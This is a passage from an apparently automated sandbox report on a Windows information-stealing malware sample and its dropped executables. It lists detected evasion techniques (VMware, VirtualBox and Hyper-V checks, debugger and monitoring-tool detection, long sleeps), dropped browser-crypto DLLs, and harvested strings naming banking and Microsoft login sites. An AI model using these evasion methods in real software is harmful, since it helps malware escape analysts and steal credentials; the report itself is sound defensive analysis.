Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Code function: 5_2_04F80A26 rdtsc 5_2_04F80A26
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 360
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 371
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 7.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052 Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052 Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep count: 360 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028 Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028 Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6620 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180 Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500 Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep count: 371 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep time: -11130000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1440 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720 Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)F
Source: BGIJDGCA.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3285409912.000000000144B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002765000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002739000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE920000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.3296660435.00000221E2219000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: BGIJDGCA.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: BGIJDGCA.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BGIJDGCA.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: BGIJDGCA.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BGIJDGCA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: BGIJDGCA.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: explorti.exe, 00000013.00000002.3285409912.0000000001419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx3R
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware }!
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: BGIJDGCA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BGIJDGCA.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BGIJDGCA.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BGIJDGCA.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BGIJDGCA.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BGIJDGCA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BGIJDGCA.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BGIJDGCA.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: BGIJDGCA.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BGIJDGCA.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Code function: 5_2_04F80A26 rdtsc 5_2_04F80A26
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Contains functionality to dynamically determine API calls
